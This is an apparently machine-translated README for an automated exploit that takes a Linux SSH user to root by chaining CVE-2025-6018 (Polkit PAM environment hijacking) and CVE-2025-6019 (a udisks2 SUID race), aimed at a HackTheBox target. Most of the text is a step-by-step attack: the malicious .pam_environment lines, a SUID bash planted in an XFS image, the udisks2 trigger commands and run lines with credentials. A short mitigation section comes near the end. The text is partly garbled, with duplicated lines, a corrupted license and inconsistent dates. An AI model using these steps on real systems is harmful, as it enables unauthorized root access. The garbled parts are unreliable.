Share
## https://sploitus.com/exploit?id=A7F62A03-F46C-5CF4-BC1A-6F3419DD865A
# CVE-2025-6018 + CVE-2025-6019 Exploit

**Linux Local Privilege Escalation Chain**
**Linux Local Privilege Escalation Chain**

Automated exploit for privilege escalation from unprivileged user to root via Polkit PAM hijacking and libblockdev/udisks2 race condition.

Automated exploit for privilege escalation from unprivileged user to root via Polkit PAM hijacking and libblockdev/udisks2 race condition.

---

## ๐ŸŽฏ Overview / Overview

This script chains two vulnerabilities to achieve local privilege escalation.

This script chains two vulnerabilities to achieve local privilege escalation:

1. **CVE-2025-6018** - Polkit PAM Environment Variable Hijacking
- Bypass Polkit authentication by forging local session identity
- Bypassing Polkit authentication by forging local session identity

2. **CVE-2025-6019** - libblockdev/udisks2 Race Condition
- Exploit unsafe SUID preservation during XFS mount operations
- Exploit unsafe SUID preservation during XFS mount operations

**Attack Flow / Attack Flow:**
```
Unprivileged SSH User
โ†“
CVE-2025-6018: Hijack ~/.pam_environment
โ†“
Obtain allow_active permission (Polkit)
โ†“
CVE-2025-6019: Trigger udisks2 mount
โ†“
Race condition โ†’ SUID bash in /tmp
โ†“
Root Shell (euid=0)
``

---

## ๐Ÿ“‹ Requirements / System Requirements

### **Target System / Target System**

- **OS:** Linux (Ubuntu 24.04 LTS tested / tested on Ubuntu 24.04 LTS)
- **Services:** systemd-logind, udisks2, polkit
- **User:** SSH access with valid credentials / valid SSH credentials

### **Attack Machine / Attack Machine**

- **OS:** Linux (any distribution / any distribution)
- **Privileges:** Root (required for XFS image creation / Required for XFS image creation)
- **Tools / Tools:**
- Python 3.6+
- `xfsprogs` (mkfs.xfs)
- `util-linux` (mount/umount)
- `sshpass` (mkfs.xfs)
- `openssh-client` (ssh/scp)

---

## ๐Ÿ› ๏ธ Installation / Installation

### **Debian/Ubuntu**
```bash
sudo apt update
sudo apt install -y python3 xfsprogs sshpass openssh-client
```

### **RHEL/CentOS**
```bash
sudo yum install -y python3 xfsprogs sshpass openssh-clients
```

### **Arch Linux** ``bash
```bash
sudo pacman -S python xfsprogs sshpass openssh
```

---

## ๐Ÿš€ Usage / Usage

### **Basic Usage / Basic usage**

```bash
sudo python3 exploit_progress.py
```

### **Example / Sample**

```bash
# Single quote password to avoid shell expansion
# Single quote password to avoid shell expansion
sudo python3 exploit_progress.py 10.129.252.133 phileasfogg3 '!QAZ2wsx'
```

### **Options / options**

```bash
sudo python3 exploit_progress.py -h
```

| Option / Options | Description / Description |
|---------------|-------------------|
| ``--no-shell`` | Skip interactive root shell / Skip interactive root shell |
| `--keep` | Keep local XFS image / Keep local XFS images |

### **Advanced Examples / Advanced examples

```bash
# Get flag only, no shell
# Get flag only, no shell
sudo python3 exploit_progress.py 10.10.10.1 user 'pass' --no-shell

# Keep XFS image for analysis
# Keep XFS image for analysis
sudo python3 exploit_progress.py 10.10.10.1 user 'pass' --keep
``

---

## ๐Ÿ“Š Execution Flow / Execution Flow

### **Stage 1: XFS Image Creation / Creating an XFS image
```
[1/7] Creating malicious XFS image / Creating malicious XFS image
โœ“ File created: 300 MB / File created: 300 MB
โœ“ XFS formatted / XFS formatting complete
โœ“ SUID bit set (mode 4755) / SUID bit set (permission 4755)
``

Creates a 300MB XFS filesystem containing a SUID bash binary.

Creates a 300MB XFS filesystem containing a SUID bash binary.

---

### **Stage 2: PAM Environment Hijacking / PAM environment hijacking**
```
[2/7] CVE-2025-6018: PAM hijacking / PAM environment variable hijacking
โœ“ PAM environment configured / PAM environment variable configured
```

Writes malicious `~/.pam_environment`.
```
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
```

This tricks systemd-logind into treating the SSH session as a local physical login.

This tricks systemd-logind into treating the SSH session as a local physical login.

---

### **Stage 3: Polkit Permission Verification / Polkit Permission Verification**
```
[3/7] Verifying allow_active / Verifying allow_active permissions
โœ“ allow_active granted / allow_active permission granted
```

Verifies we obtained `allow_active` permission by testing.
``bash
gdbus call --system --dest org.freedesktop.login1 \
--method org.freedesktop.login1.Manager.CanReboot
``

Expected output: `('yes',)` (instead of `('challenge',)`)

Expected output: `('yes',)` (instead of `('challenge',)`)

---

### **Stage 4: Image Upload / image upload**
```
[4/7] Uploading XFS image / Uploading XFS image
โœ“ Upload complete / Upload complete
```

Transfers the 300MB XFS image to target via SCP.

Transfers the 300MB XFS image to target via SCP.

---

### **Stage 5: udisks2 Exploitation / udisks2 Exploit**
```
[5/7] CVE-2025-6019: udisks2 exploit / udisks2 Exploitation
โœ“ SUID bash: /tmp/blockdev.Xy12Ab/bash
โœ“ SUID bash: /tmp/blockdev.Xy12Ab/bash

**Technical Details / Technical Details:**

1. Kill GVFS monitor to prevent auto-unmount

Kill GVFS monitor to prevent auto-unmount

2. Create loop device: `udisksctl loop-setup --file xfs.image`

Create loop device

3. Trigger mount via Resize operation: `org.freedesktop.udisks2.filesystem.Resize`

Trigger mount via resize operation

4. Race condition: Access SUID bash before GVFS unmounts

Race condition: Access SUID bash before GVFS unmounts

---

### **Stage 6: Root Escalation / Root Privilege**
```
[6/7] Escalating to root / Escalating to root
โœ“ Root access confirmed / Root privileges confirmed
```

Executes: `. /bash -p -c 'id'`

Verifies: `euid=0(root)`

---

### **Stage 7: Flag Capture / get Flag**
```
[7/7] Reading root flag / Reading root flag

โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
โ•‘ ROOT FLAG / ROOT Flag โ•‘ โ•‘
โ•‘ 45241ac3274a6b4d1d5c174a60d02003 โ•‘
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

โœ“ Privilege escalation successful!
Time elapsed / Time: 45.2s
```

Reads `/root/root.txt` and launches interactive root shell.

Reads `/root/root.txt` and launches interactive root shell.

---

## ๐Ÿ” Troubleshooting / Troubleshooting

### **Issue: "allow_active not granted" / Issue.

**Cause:** PAM environment not yet active

**Cause:** PAM environment variable not yet active

**Solution:**
```bash
# Manual re-login required
# Manual re-login required
ssh user@target
ssh user@target
ssh user@target

# Verify session
# Verify session
loginctl show-session $XDG_SESSION_ID | grep Seat
# Should show: Seat=seat0
``

---

### **Issue: "SUID bash not found" / Question.

**Cause:** Race condition timing issue

**Cause:** Race condition timing issue

**Solution:**
```bash
# Check if loop device was created
# Check if loop device was created
losetup -a | grep xfs.image

# Manually check /tmp
# Manually check /tmp
find /tmp -name bash -perm -4000 2>/dev/null

# Re-run script
# Re-run script
``

---

### **Issue: "Upload failed" / Issue.

**Cause:** Network connectivity or SSH issues

**Cause:** Network connectivity or SSH issues

**Solution:**
```bash
# Test SSH connection manually
# Test SSH connection manually
sshpass -p 'password' ssh -o StrictHostKeyChecking=no user@target 'id'

# Check disk space on target
# Check disk space on target
ssh user@target 'df -h ~'
```

---

### **Issue: "Missing tools" / Issue.

**Error:**
```
โœ— Missing tools: mkfs.xfs, sshpass
Install: apt install xfsprogs sshpass openssh-client
```

**Solution:**
```bash
# Install required packages
# Install required packages
sudo apt install xfsprogs sshpass openssh-client

# Verify installation
# Verify installation
which mkfs.xfs sshpass ssh
``

---

## ๐Ÿ›ก๏ธ Mitigation / Mitigation

### **For System Administrators / System Administrator**

1. **Patch Systems / Updating Systems**
```bash
sudo apt update
sudo apt upgrade polkit udisks2
```

2. **Disable PAM Environment / Disable PAM Environment Variables**
```bash
# Edit /etc/pam.d/sshd
sudo sed -i '/pam_env.so user_readenv=1/d' /etc/pam.d/sshd
```

3. **Restrict udisks2 / restrict udisks2**
```bash
# Create Polkit rule: /etc/polkit-1/rules.d/50-udisks.rules
polkit.addRule(function(action, subject) {
if (action.id.indexOf("org.freedesktop.udisks2") == 0) {
return polkit.Result.AUTH_ADMIN;
}
});
``

4. **Monitor Suspicious Activity / monitor suspicious activity**
```bash
# Watch for loop device creation
# Watch for loop device creation
auditctl -w /dev/loop0 -p wa -k loop_device

# Monitor PAM environment
# Monitor PAM environment variables
auditctl -w /home -p wa -k pam_env
``

---

## โš ๏ธ Legal Disclaimer / Legal Disclaimer

**English:**

This tool is provided for **educational and authorized security testing purposes only**.

- Only use on systems you own or have explicit permission to test
- Unauthorized access to computer systems is illegal
- The author is not responsible for misuse or damage caused by this tool
- By using this tool, you agree to comply with all applicable laws

**By using this tool you agree to comply with all applicable laws

This tool is intended for **educational and authorized security testing purposes only**.

- Use only on systems that you own or have been expressly authorized to test on
- Unauthorized access to a computer system is illegal
- The author is not responsible for misuse or damage caused by this tool
- By using this tool, you agree to comply with all applicable laws.

---


## ๐Ÿค Contributing / Contributing

Contributions are welcome!

**How to contribute / ๅฆ‚ไฝ•่ดก็Œฎ:**

1. Fork this repository / Fork this repository
2. Create a feature branch / Create feature branch
```bash
git checkout -b feature/improvement
```
3. Commit your changes / Commit your changes
```bash
git commit -m "Add improvement"
```
4. Push to the branch / Push to the branch
```bash
git push origin feature/improvement
```
5. Open a Pull Request / Open Pull Request

---

## ๐Ÿ“„ License / license

This project is licensed under the **MIT License**.

This project is licensed under the **MIT License**.

``
MIT License

Copyright (c) 2025

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal with the Software, and to provide the Software to any third party.
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
The Software is furnished to do so, subject to the following conditions.

The above copyright notice and this permission notice shall be included in all
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

the software is providered "as is", without warranty of any kind, express or implied, incoming but not limited to
implied, inconsistent with any warranties of merchantability, fitness for a part of the software, or substantial portion of the software.
fitness for a particular purpose and noninfringement. in no event shall the
authors or copyright holders be limited for any clay, damages or other
labority, whither in any action of contract, tort or otherwise, arguing from, out of or in connection with
out of or in connection with the softwares or the use or other dealings in the
SOFTWARE.
``

---

## ๐ŸŒŸ Acknowledgments / Acknowledgments

- Original vulnerability researchers / ๅŽŸๅง‹ๆผๆดž็ ”็ฉถ่€…
- Open source security community / Open source security community
- HackTheBox platform / HackTheBox Platform

---

## ๐Ÿ“Š Compatibility Matrix / Compatibility Matrix

| OS / Operating System | Version / Edition | Status / Status |
|---------------|----------------|---------------|
| Ubuntu | 24.04 LTS | โœ… Tested / Tested |
| Ubuntu | 22.04 LTS | โœ… Tested / tested |
| Debian | 12 (Bookworm) | โš ๏ธ May work / may work |
| Fedora | 39+ | โš ๏ธ May work / may work |
| Arch Linux | Latest / Newest | โš ๏ธ May work / may work |
| RHEL/CentOS | 9+ | โŒ Not vulnerable / Unaffected |

---

## ๐Ÿ”ง Development / Development

### **Project Structure / Project Structure**

```
.
โ”œโ”€โ”€ exploit_progress.py # Main exploit script / Main exploit script
โ”œโ”€โ”€ README.md # This file / This file
โ”œโ”€โ”€ LICENSE # MIT License / MIT License
โ””โ”€โ”€ examples/ # Usage examples / Usage examples
โ”œโ”€โ”€ basic.sh
โ”œโ”€โ”€ advanced.sh
โ””โ”€โ”€ troubleshooting.md
```

### **Testing / Test**

```bash
# Dry run (check dependencies only)
# Dry run (check dependencies only)
sudo python3 exploit_progress.py --help

# Test on vulnerable VM
# Test on vulnerable VM
sudo python3 exploit_progress.py 192.168.1.100 testuser 'testpass'

# Automated testing
# Automated testing
. /test.sh
```

---

## ๐Ÿ“ˆ Version History / Version History

### **v1.0.0** (2025-02-09)
- Initial release / Initial release
- Support for CVE-2025-6018 + CVE-2025-6019
- Bilingual output (EN/CN) / Bilingual output (English/Chinese)
- Progress indicators / Progress indicators
- Interactive root shell / Interactive root shell

---

## โญ Star History / Star History

If this tool helped you, please consider giving it a star!

If this tool helped you, please consider giving it a star! โญ

---

**Happy Hacking!!! / Have fun hacking! ** ๐ŸŽ‰

**Use responsibly. / Use responsibly. *
ร‚ ร‚ ร‚ ร‚ ร‚ ร‚ ร‚ ร‚ ร‚ ร‚ ร‚ ร‚ ร‚